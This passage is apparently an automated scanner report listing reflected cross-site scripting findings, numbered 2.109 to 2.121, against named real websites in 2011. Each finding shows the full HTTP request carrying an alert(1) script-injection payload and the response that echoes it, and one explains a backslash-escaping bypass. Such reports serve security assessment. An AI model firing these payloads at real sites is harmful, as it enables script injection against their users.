Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:59 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 12 May 2011 13:29:59 GMT
Content-Length: 1323

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<!-- NO AD TEXT: _QUERY_STRING="CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=130381cf86--><a>0abcf34b1c3" _REQ_NUM="0" -->
...[SNIP]...

2.109. http://mads.zdnet.com/mac-ad [ADREQ&beacon parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 8d698<a>ee8bfb9666e was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=18d698<a>ee8bfb9666e&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:30 GMT
Server: Apache/2.2
Content-Length: 454
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:30:30 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=18d698<a>ee8bfb9666e&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1869889666' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw4.cnet.com::1287985472
...[SNIP]...

2.110. http://mads.zdnet.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e083'%3balert(1)//f482dca7251 was submitted in the PAGESTATE parameter. This input was echoed as 9e083';alert(1)//f482dca7251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=9e083'%3balert(1)//f482dca7251&SITE=2&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:29 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:29:29 GMT

/* MAC ad */<!-- no beacon mappings defined -->;window.CBSI_PAGESTATE='9e083';alert(1)//f482dca7251';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw7.cnet.com::1711409472 2011.05.12.13.29.29 *//* MAC T 0.0.0.0 */

2.111. http://mads.zdnet.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload cfcb3<a>8a75e829cdc was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2cfcb3<a>8a75e829cdc&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.zdnet.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:35 GMT
Server: Apache/2.2
Content-Length: 497
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Thu, 12 May 2011 13:29:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=2cfcb3<a>8a75e829cdc&NCAT=6037%3A13616%3A&PTYPE=2100&CID=207595&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=95313175&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='23875829' PTYPE=
...[SNIP]...

2.112. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers-service.cbsinteractive.com
Path:   /offers/script.sc

Issue detail

The value of the offerId request parameter is copied into the HTML document as plain text between tags. The payload 43138<script>alert(1)</script>b34b7ff49eb was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/script.sc?offerId=10343138<script>alert(1)</script>b34b7ff49eb HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=90898760.1303940884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=90898760.1302257195.1303940884.1303940884.1303940884.1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 89
Date: Thu, 12 May 2011 13:28:31 GMT

// Offer id 10343138<script>alert(1)</script>b34b7ff49eb does not exists or is not ACTIVE

2.113. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 76cc7%0aalert(1)//24965fd8f38 was submitted in the url parameter. This input was echoed as 76cc7
alert(1)//24965fd8f38
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml76cc7%0aalert(1)//24965fd8f38&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22Share+it%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23ffffff%22,%22ENDCAP_LINK_COLOR%22:%22%23ffc619%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_TEXT_COLOR%22:%22%23ffffff%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%23ffc619%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23000000%22,%22CONTENT_HEADLINE_COLOR%22:%22%23050c10%22,%22FONT_FACE%22:%22normal+normal+20px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif;%22%7D%7D&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209791819.1303087791.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=209791819.444546987.1303087791.1303087791.1304097769.2

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:33:03 GMT
Expires: Thu, 12 May 2011 13:33:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 116

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml76cc7
alert(1)//24965fd8f38
. HTTP error 400

2.114. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload ef311%0aalert(1)//395ed2543b7 was submitted in the url parameter. This input was echoed as ef311
alert(1)//395ed2543b7
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xmlef311%0aalert(1)//395ed2543b7&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:33:04 GMT
Expires: Thu, 12 May 2011 13:33:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 126

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/members.xmlef311
alert(1)//395ed2543b7
. HTTP error 400

2.115. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a3d0b<script>alert(1)</script>013717e0c3d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5362797&plc=61693702&sid=953446&num=5&ver=2&dv_url=http%3A//cdn-bpx.a9.com/amzn/iframe.html%3Fp%3D281%3Blast%3D1094%3Br%3Da834682&callback=__verify_callback_828489752952a3d0b<script>alert(1)</script>013717e0c3d HTTP/1.1
Host: rtb50.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84483/219801/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Thu, 12 May 2011 13:33:54 GMT
Connection: close
Content-Length: 74

__verify_callback_828489752952a3d0b<script>alert(1)</script>013717e0c3d(2)

2.116. http://services.digg.com/1.0/endpoint [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6afa2<script>alert(1)</script>f2e9a63b104 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_067839310271665456afa2<script>alert(1)</script>f2e9a63b104 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Content-Length: 172
X-RateLimit-Current: 54
Etag: "67882ee11f838b332291892eee8b6df3bb578777"
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3488

gig_pc_digg_1305206920623_067839310271665456afa2<script>alert(1)</script>f2e9a63b104({
"count": 0,
"timestamp": 1305207035,
"total": 0,
"stories": []
});

2.117. http://services.digg.com/1.0/endpoint [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 9e48c<script>alert(1)</script>9acc52f72d6 was submitted in the method parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll9e48c<script>alert(1)</script>9acc52f72d6&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_06783931027166545 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 403 Forbidden
Content-Length: 221
X-RateLimit-Current: 37
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3511

gig_pc_digg_1305206920623_06783931027166545({
"status": 403,
"timestamp": 1305207012,
"message": "No such method 'story.getAll9e48c<script>alert(1)</script>9acc52f72d6' on version 1.0",
"code": 1052
});

2.118. http://services.digg.com/1.0/endpoint [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.digg.com
Path:   /1.0/endpoint

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9033a<script>alert(1)</script>25ba0b9de6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.0/endpoint?method=story.getAll&link=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html&type=javascript&callback=gig_pc_digg_1305206920623_06783931027166545&9033a<script>alert(1)</script>25ba0b9de6c=1 HTTP/1.1
Host: services.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 403 Forbidden
Content-Length: 194
X-RateLimit-Current: 84
Server: TornadoServer/0.1
Content-Type: text/javascript
X-RateLimit-Max: 5000
X-RateLimit-Reset: 3452

gig_pc_digg_1305206920623_06783931027166545({
"status": 403,
"timestamp": 1305207071,
"message": "Unknown argument 9033a<script>alert(1)</script>25ba0b9de6c",
"code": 1001
});

2.119. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [bullet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the bullet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10439\'%3balert(1)//79f264c7f46 was submitted in the bullet parameter. This input was echoed as 10439\\';alert(1)//79f264c7f46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue10439\'%3balert(1)//79f264c7f46&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:48 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68549

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<div class="t-p t-tn &#xD;&#xA;                    t-bg5 &#xD;&#xA;                    t-bullet-blue10439\\';alert(1)//79f264c7f46">
...[SNIP]...

2.120. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59e5\'%3balert(1)//c310a5bf213 was submitted in the title parameter. This input was echoed as d59e5\\';alert(1)//c310a5bf213 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisersd59e5\'%3balert(1)//c310a5bf213&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:01 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68609

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/" title="Click to view more Advertisersd59e5\\';alert(1)//c310a5bf213" target="">
...[SNIP]...

2.121. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [track parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the track request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6be1a\'%3balert(1)//b579f80b78c was submitted in the track parameter. This input was echoed as 6be1a\\';alert(1)//b579f80b78c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3E&titlelink=true&track=Adv_List6be1a\'%3balert(1)//b579f80b78c HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
